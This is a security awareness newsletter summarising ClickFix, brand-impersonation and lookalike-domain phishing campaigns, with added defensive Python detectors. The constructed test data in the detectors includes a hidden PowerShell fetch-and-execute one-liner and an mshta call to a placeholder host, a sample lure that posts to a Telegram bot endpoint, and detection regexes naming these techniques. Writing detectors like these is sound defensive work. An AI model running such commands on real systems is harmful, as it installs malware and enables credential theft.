Exploring Information Security

Securing the Future - A Journey into Cybersecurity Exploration

December 2025 - ExploreSec Cybersecurity Awareness Newsletter

December 5, 2025

This is a monthly newsletter I put together for an internal security awareness program. Feel free to grab it and use it for your own program.

The Most Advanced ClickFix Yet (Push Security) 

Push Security researchers have uncovered a new and highly refined iteration of the “ClickFix” phishing framework, featuring modular capabilities for credential harvesting and session hijacking. This version uses advanced URL obfuscation, cloud-hosted redirects, and adaptive templates that mimic corporate login portals to bypass detection and deceive users more effectively. 

Key Insights 

  • Framework evolution: ClickFix’s latest version integrates dynamic templates and tokenized redirects to evade pattern-based blocking. 

  • Session hijacking: Stolen authentication cookies allow attackers to access corporate accounts even when multi-factor authentication is enabled. 

  • Cloud abuse: Hosting payloads on legitimate cloud services gives attackers credibility and helps phishing links evade automated scanning. 

  • Rapid deployment: The phishing kits are prepackaged for affiliates, enabling faster setup and broader campaign reach. 

  • Enterprise risk: The sophistication and modularity of ClickFix underline a trend toward professionalized phishing-as-a-service ecosystems. 

Further Reading: Push Security 

Minecraft, Qwerty and India123 Among 2025’s Most Common Passwords (Comparitech) 

Comparitech’s latest report reveals that easily guessable passwords like “minecraft”, “qwerty”, and “india123” remain widely used despite increased awareness of password security. The findings underscore the persistent risk of weak authentication across individuals and organisations, particularly in enterprise contexts where password reuse and default credentials continue to expose systems to credential-dumping and brute-force attacks. 

Key Insights 

  • Weak passwords persist: “minecraft” topped the list of most common passwords of 2025, followed by “qwerty” and “india123”. 

  • Password-reuse risk: Many breached credentials show repeated reuse of these weak passwords across multiple services, amplifying breach impact. 

  • Default and predictable credentials: A significant share of password sets were based on games, simple keyboard walks (qwerty), or culturally common strings — all easily breached. 

  • Enterprise & IoT exposure: Weak passwords are especially problematic in business systems and connected devices where password requirements are lax and monitoring is minimal. 

  • Actionable takeaway: Organisations should block commonly used weak passwords, enforce passphrase complexity and implement password-less or MFA approaches to reduce risk. 

Further Reading: Comparitech 
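The "block commonly used weak passwords" recommendation above is easy to state and easy to get wrong: a deny list that only matches exact strings lets "Minecraft2025" and "P@ssw0rd!" through. The check below is an added example written for this newsletter, not code from Comparitech or from any password product. It normalises a candidate (case, leet-speak, the trailing "123" or "!" people append) before comparing it with a constructed deny list, and separately flags keyboard walks. The six-entry deny list and the 12-character minimum are placeholders for the example; a real deployment would load a breached-password corpus and apply its own policy.

```python
import re

# Constructed deny list for this example. A production check would load a large
# breached-password corpus (for instance a Have I Been Pwned download) instead.
COMMON_PASSWORDS = {"minecraft", "qwerty", "india123", "password", "123456", "letmein"}

# Keyboard rows used to catch "keyboard walks" such as qwerty, asdfgh or zxcvbn.
KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")

# Leet-speak substitutions folded back to letters so that P@ssw0rd matches password.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})

# Example policy knob: the newsletter recommends passphrases but names no length.
MIN_LENGTH = 12


def normalize(password: str) -> str:
    """Reduce a password to its base word: lower-case it, drop a trailing run of
    digits/symbols (the "2025" or "!" users append), then undo leet-speak."""
    lowered = password.lower()
    stripped = re.sub(r"[\d!@#$%^&*._-]+$", "", lowered) or lowered
    return stripped.translate(LEET)


# Deny-list entries are normalised once so "india123" also catches "India123!".
NORMALIZED_COMMON = {normalize(p) for p in COMMON_PASSWORDS}


def is_keyboard_walk(password: str) -> bool:
    """True when the password (letters/digits only) is a straight run along one
    keyboard row, forwards or backwards, e.g. qwertyuiop or 0987654321."""
    run = re.sub(r"[^a-z0-9]", "", password.lower())
    if len(run) < 4:
        return False
    return any(run in row or run in row[::-1] for row in KEYBOARD_ROWS)


def check_password(password: str) -> list[str]:
    """Return policy findings for a candidate password; an empty list means it passes."""
    findings = []
    lowered = password.lower()
    base = normalize(password)
    if lowered in COMMON_PASSWORDS or base in NORMALIZED_COMMON:
        findings.append("matches a commonly used password")
    if is_keyboard_walk(password):
        findings.append("keyboard walk")
    if len(password) < MIN_LENGTH:
        findings.append(f"shorter than {MIN_LENGTH} characters")
    return findings


if __name__ == "__main__":
    for candidate in ("Minecraft2025", "P@ssw0rd!", "qwertyuiop", "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate) or 'ok'}")
```

The normalisation step is the part worth copying: without it, "Minecraft2025" passes an exact-match deny list even though the report's most common password is sitting inside it.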

New Phishing Campaign Exploits Meta Business Suite to Target SMBs Across the U.S. and Beyond (Check Point Research) 

Check Point Research uncovered a phishing campaign that abuses the Meta Business Suite JSON API flows to masquerade as legitimate business-management notifications. Through this abuse, attackers sent convincing lures to SMBs in the U.S. and globally, claiming billing issues or account suspension and directing victims to fake login portals. The campaign succeeded in bypassing detection by conforming to expected API patterns and dynamically generating URLs that appear unique per victim. 

Key Insights 

  • API abuse for legitimacy: Attackers used Meta’s business-management JSON callbacks to fetch business names and tailor phishing messages, increasing trust and clicks. 

  • Global SMB targeting: While initial hits were in the U.S., the campaign expanded to over 20 countries, focusing on small and mid-sized businesses with available business-suite integrations. 

  • Dynamic URL generation: Each phishing link was unique and time-limited, preventing bulk blocking and defeating static URL reputation databases. 

  • Credential theft via login proxy: Victims were redirected to an Azure-hosted login page that mirrored the Meta Business Suite sign-in interface, capturing both credentials and session cookies. 

  • Evading detection: Because the attacker-generated callback requests resembled normal Meta API traffic, email filters reliant on anomaly detection struggled to flag the messages. 

Further Reading: Check Point Research – New Phishing Campaign Exploits Meta Business Suite to Target SMBs Across the U.S. and Beyond 

New Phishing Attack Leverages Popular Brands to Harvest Logins (Cybersecurity News) 

A recent phishing campaign delivers self-contained HTML attachments that impersonate trusted brands such as Microsoft 365, Adobe, FedEx, and DHL to harvest credentials. These attachments bypass external link filtering by embedding phishing pages directly in the email and use JavaScript to send stolen data to Telegram bots rather than traditional command-and-control servers. The campaign targets industries like agriculture, automotive, construction, and education in regions including the Czech Republic, Slovakia, Hungary, and Germany. 

Key Insights 

  • Attachment-based attack delivery: Phishing emails include HTML files with fake login portals, avoiding reliance on external links and reputation lists. 

  • Brand impersonation at scale: Multiple major brands are mimicked to increase trust and widen the potential victim pool. 

  • Direct data exfiltration using Telegram bots: Stolen credentials are sent directly through Telegram Bot API, reducing detection trace-paths. 

  • Industry & regional targeting: Focused on sectors with frequent procurement flows and Central/Eastern European markets, showing deliberate target selection. 

  • Technical evasion tactics: Use of RFC-compliant filenames (e.g., “RFQ_4460-INQUIRY.HTML”) helps disguise malicious attachments as legitimate business documents. 

Further Reading: Cybersecurity News 
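Because the phishing page travels inside the attachment, a URL-reputation filter never sees a link to block; the attachment itself has to be inspected. The scanner below is an added example for this newsletter, not code from the researchers cited, and it works from the two traits the summary describes: a password form embedded in an HTML file and a script that talks to the Telegram Bot API. Both sample attachments are constructed for the example (the Telegram bot token is a placeholder string, not a real token), and the "block/review/clean" verdicts are an assumed policy.

```python
import re
from html.parser import HTMLParser

# The Telegram bot endpoint is the exfiltration channel described in the summary.
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot", re.I)


class AttachmentScanner(HTMLParser):
    """Collect the features that make a self-contained phishing page:
    password inputs, form targets and the text of inline scripts."""

    def __init__(self) -> None:
        super().__init__()
        self.password_inputs = 0
        self.form_actions: list[str] = []
        self.scripts: list[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attributes = {name: (value or "") for name, value in attrs}
        if tag == "input" and attributes.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(attributes.get("action", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are delivered as data while the parser is inside <script>.
        if self._in_script:
            self.scripts.append(data)


def scan_html_attachment(html: str) -> dict:
    """Return the findings and an assumed gateway verdict for one HTML attachment."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    script_text = "".join(scanner.scripts)
    findings = []
    if scanner.password_inputs:
        findings.append("password field inside an HTML attachment")
    if TELEGRAM_BOT_API.search(script_text) or any(TELEGRAM_BOT_API.search(a) for a in scanner.form_actions):
        findings.append("submits data to the Telegram Bot API")
    verdict = {0: "clean", 1: "review", 2: "block"}[len(findings)]
    return {"password_inputs": scanner.password_inputs, "findings": findings, "verdict": verdict}


# Constructed lure modelled on the summary (placeholder bot token, no real endpoint).
LURE_HTML = """<html><body>
<h2>Microsoft 365 - sign in to view RFQ_4460-INQUIRY</h2>
<form id="login"><input name="email"><input type="password" name="pw"><button>Sign in</button></form>
<script>
document.getElementById("login").onsubmit = function (e) {
  e.preventDefault();
  fetch("https://api.telegram.org/bot__TOKEN_PLACEHOLDER__/sendMessage", {method: "POST"});
};
</script></body></html>"""

# Constructed benign attachment: no form, script does not contact Telegram.
BENIGN_HTML = """<html><body><h1>Quarterly report</h1><p>Figures attached as PDF.</p>
<script>console.log("loaded");</script></body></html>"""


if __name__ == "__main__":
    print("lure  :", scan_html_attachment(LURE_HTML))
    print("benign:", scan_html_attachment(BENIGN_HTML))
```

A password field alone is not proof of phishing (exported web forms exist), which is why the example only returns "block" when the credential form and the Telegram exfiltration path appear together and routes single-trait files to review.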

Inside the Scattered Lapsus$ Hunters (Push Security) 

Push Security analyzed the resurgence of the Scattered Lapsus$ Hunters, a cybercrime group known for high-profile data breaches and social-engineering-driven attacks. The group has evolved its techniques, targeting enterprise collaboration platforms and cloud accounts to gain unauthorized access and exfiltrate sensitive data. 

Key Insights 

  • Social engineering roots: The group continues to rely on credential theft and social manipulation rather than technical exploits. 

  • Corporate infiltration: They focus on compromising employees with elevated permissions to reach critical systems. 

  • Operational evolution: Recent campaigns show improved coordination and use of legitimate services for persistence and data transfer. 

  • Brand targeting: The group’s activity spans technology, telecom, and SaaS sectors, emphasizing organizations with valuable data. 

Further Reading: Push Security – Inside the Scattered Lapsus$ Hunters 

New ClickFix Attack Tricks Users with ‘Fake OS Update’ to Execute Malicious Commands (Cybersecurity News) 

A new iteration of the ClickFix social-engineering campaign deploys a browser-based fake Windows update prompt that simulates a system crash or update screen. Victims who follow on-screen instructions end up executing malicious commands, leading to remote access, infostealer installations, or ransomware loaders. 

Key Insights 

  • The deceptive overlay mimics a Windows update or Blue Screen of Death (BSOD) complete with progress bar and error codes, inducing urgency and fear. 

  • Victims are instructed to perform “manual fixes” such as pressing Ctrl+Alt+Del, entering commands in a pseudo CLI, and downloading a “recovery tool” which is actually malware. 

  • The campaign leverages both PCs and mobile devices, with full-screen simulations compatible across platforms. 

  • Because the user initiates the commands themselves, many security tools fail to flag the activity as malicious. 

  • This attack underlines the persistent importance of user awareness and a skeptical mindset toward unexpected system update prompts. 

Further Reading: Cybersecurity News 

Global Cyber Attacks Surge in October 2025 Amid Explosive Ransomware Growth and Rising GenAI Threats (Check Point Research) 

In October 2025, organizations saw a sharp rise in cyber attacks, with weekly averages nearing 2,000 per organization. Ransomware activity expanded significantly, and GenAI-related risks continued to emerge as organizations adopted newly integrated AI tools. 

Key Insights 

  • Weekly attack volumes increased across most regions, with several sectors experiencing notable year-over-year growth. 

  • Ransomware incidents rose substantially, reflecting broader adoption of opportunistic targeting. 

  • GenAI usage introduced new exposure points, particularly around prompt-based data leakage. 

  • Education, telecommunications, and government sectors experienced the highest attack frequency. 

Further Reading: Check Point Research 

DoorDash Data Breach Exposes Customer Information (USA Today) 

DoorDash disclosed a security incident that exposed customer data such as names, contact details, delivery addresses, birthdays, and partial payment information.  

Key Insights 

  • Exposed data includes PII and partial payment card details. 

  • Stolen information may be misused in phishing or fraud attempts. 

  • Large consumer platforms remain attractive targets for attackers. 

  • DoorDash is notifying affected users and has initiated incident response actions. 

Further Reading: USA Today 

Fake Windows-Update Screen Pushes Malware via ClickFix Campaign (BleepingComputer) 

A new iteration of the ClickFix phishing campaign employs a fake Windows update or error screen — complete with progress bars and warning messages — to trick victims into executing malicious commands. Once the user follows the on-screen instructions, the system launches malware capable of remote access or data theft. 

Key Insights 

  • The fake update screen leverages urgency and system-failure anxiety to prompt user action. 

  • Because execution is triggered manually by the user, many defenses fail to flag the activity. 

  • Although targeting Windows, this style of UI-based deception could be adapted to other platforms. 

  • The campaign highlights a shift toward interface-spoofing rather than traditional link-based phishing. 

Further Reading: BleepingComputer 

Phishing Scam Uses “rn” to Fake Microsoft (Cybersecurity News) 

A new phishing campaign is abusing a visual trick that replaces the letter “m” with the characters “r” and “n”, creating deceptive domains such as “rnicrosoft.com.” The substitution is subtle enough that many users overlook it, especially on mobile devices, where character spacing is tighter. Attackers use these lookalike domains to deliver convincing credential-harvesting emails and login pages that appear legitimate. 

Key Insights 

  • Attackers rely on a visually deceptive domain swap (“m” → “rn”) that closely mimics legitimate Microsoft branding. 

  • The technique increases success rates because users often skim URLs, especially on smaller screens. 

  • This method reflects a broader shift toward domain-based deception rather than attachment-driven phishing. 

Further Reading: Cybersecurity News 
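The "rn" for "m" swap is a mechanical substitution, so it can be undone mechanically before a domain is compared with the brands an organisation cares about. The checker below is an added example for this newsletter, not code from the researchers cited. It folds the "rn" sequence the summary describes and, to show the check generalises, a few other sequences of the same kind ("vv" for "w", "cl" for "d", "0" for "o", "1" for "l"); the protected-brand list is constructed, and the registrable name is simplified to the second-to-last DNS label rather than using a public-suffix list.

```python
from urllib.parse import urlsplit

# Brands this organisation wants to protect (constructed list for the example).
PROTECTED_BRANDS = {"microsoft", "google", "paypal"}

# Character sequences that render like another letter at small sizes. The "rn" -> "m"
# swap is the one from the report; the rest are the same class of trick.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"))


def fold_confusables(label: str) -> str:
    """Collapse each confusable sequence to the letter it imitates."""
    folded = label.lower()
    for sequence, letter in CONFUSABLES:
        folded = folded.replace(sequence, letter)
    return folded


def host_labels(url: str) -> list[str]:
    """Split the URL's host into DNS labels; bare hosts without a scheme are accepted."""
    host = urlsplit(url if "://" in url else "//" + url).hostname or ""
    return [label for label in host.lower().split(".") if label]


def check_url(url: str) -> dict:
    """Classify a URL against the protected-brand list.

    Simplification for the example: the registrable name is taken to be the
    second-to-last label, so no public-suffix list is consulted.
    """
    labels = host_labels(url)
    host = ".".join(labels)
    if len(labels) < 2:
        return {"host": host, "verdict": "no match"}
    registrable = labels[-2]
    if registrable in PROTECTED_BRANDS:
        return {"host": host, "verdict": "genuine brand domain", "brand": registrable}
    # Brand name parked in a subdomain of an unrelated domain, e.g. microsoft.com.example-login.net
    for label in labels[:-2]:
        folded = fold_confusables(label)
        if folded in PROTECTED_BRANDS:
            return {"host": host, "verdict": "brand used as subdomain", "brand": folded}
    folded = fold_confusables(registrable)
    if folded in PROTECTED_BRANDS:
        return {"host": host, "verdict": "lookalike", "brand": folded, "label": registrable}
    return {"host": host, "verdict": "no match"}


if __name__ == "__main__":
    for sample in ("https://rnicrosoft.com/login", "https://login.microsoft.com/",
                   "https://microsoft.com.example-login.net/", "paypa1.com", "https://example.org/"):
        print(sample, "->", check_url(sample))
```

The same folding can be applied to a sender's domain at the mail gateway or to newly registered domains in a certificate-transparency feed; the point is that the comparison runs on the folded form while the report shows the user the raw one, which is where the "rn" becomes visible again.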

B2B Guest Access Creates an Unprotected Attack Vector (Ontinue) 

Microsoft’s “Chat with Anyone” capability in Teams allows users to chat with nearly any email address, but accepting a guest invite places them inside an external tenant where their organization’s security controls no longer apply. Attackers can exploit this gap to send phishing links or malicious files from low-security tenants, bypassing protections such as Safe Links and malware scanning. 

Key Insights 

  • Guest access applies the host tenant’s security controls, not the user’s home organization. 

  • Attackers can use low-cost or trial tenants to bypass URL scanning and attachment inspection. 

  • The feature is enabled globally by default, increasing the risk of unnoticed exposure. 

  • External chats can function like email-borne phishing but without standard enterprise safeguards. 

Further Reading: Ontinue 

Weaponized Google Meet Page Uses ClickFix to Deliver Malware 

Attackers are using a fake Google Meet landing page to trick users into executing malicious PowerShell commands. The site imitates the real Google Meet interface and displays a bogus camera or microphone error. It then instructs the user to run a “fix” that silently installs malware — often a Remote Access Trojan or infostealer — by copying a command to the clipboard and guiding the user to execute it through the Run dialog. Because the execution occurs outside the browser, typical browser-based protections are bypassed. 

Key Insights 

  • The attack depends entirely on social engineering, prompting users to manually run attacker-supplied commands. 

  • Browser protections are avoided because execution happens through the operating system rather than a webpage. 

  • The campaign leverages trust in Google Meet to lend legitimacy to the fake interface. 

  • Forensic artifacts on infected systems can trace activity back to the malicious site. 

Further Reading: Cybersecurity News 
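Three items in this issue (the fake OS update, the fake Windows-update screen and the fake Google Meet page) describe the same ClickFix mechanic: the victim pastes a command into the Run dialog, so the shell that appears is a child of explorer.exe rather than of a browser. That parent-child relationship, combined with command-line traits that an interactive user rarely types, is what a detection can key on. The triage below is an added example for this newsletter, not a rule from any of the cited vendors; the four process-creation events are constructed with Sysmon-style field names, the URLs in them are placeholders, and the "alert/review/benign" thresholds are an assumed policy.

```python
import json
import re

# Interpreters a ClickFix lure typically tells the victim to launch from the Run dialog.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Processes started from the Run dialog (Win+R) are children of explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"

# Command-line traits that are rare in interactive use but common in pasted one-liners.
SUSPICIOUS_TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "remote_fetch": re.compile(r"https?://|downloadstring|invoke-webrequest|\biwr\b|\biex\b", re.I),
}

# Constructed Sysmon-style process-creation events, one JSON object per line.
# Event 1: pasted ClickFix one-liner; 2: user opening a shell; 3: scheduled task; 4: mshta lure.
SAMPLE_EVENTS = r'''
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr https://meet-fix.example/check)\""}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
{"ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://meet-fix.example/update.hta"}
'''


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> dict:
    """Return the traits found plus a verdict for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    traits = [name for name, pattern in SUSPICIOUS_TRAITS.items() if pattern.search(cmdline)]
    run_dialog_shell = parent == RUN_DIALOG_PARENT and image in SHELL_IMAGES
    if run_dialog_shell and ("remote_fetch" in traits or len(traits) >= 2):
        verdict = "alert"
    elif run_dialog_shell and traits:
        verdict = "review"
    else:
        verdict = "benign"
    return {"image": image, "parent": parent, "traits": traits, "verdict": verdict}


def triage(jsonl: str) -> list[dict]:
    """Score every non-empty line of a JSON-lines event feed."""
    return [score_event(json.loads(line)) for line in jsonl.splitlines() if line.strip()]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["verdict"].upper(), result["parent"], "->", result["image"], result["traits"])
```

The third event shows why the parent check matters: a scheduled backup script with an execution-policy bypass is unremarkable under svchost.exe, while the identical flag typed into the Run dialog is exactly what these lures produce. Telemetry that records the parent image, such as Sysmon event ID 1 or the equivalent EDR process-start event, is the prerequisite.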

Posted in News. Tags: Newsletter, Phishing, Ransomware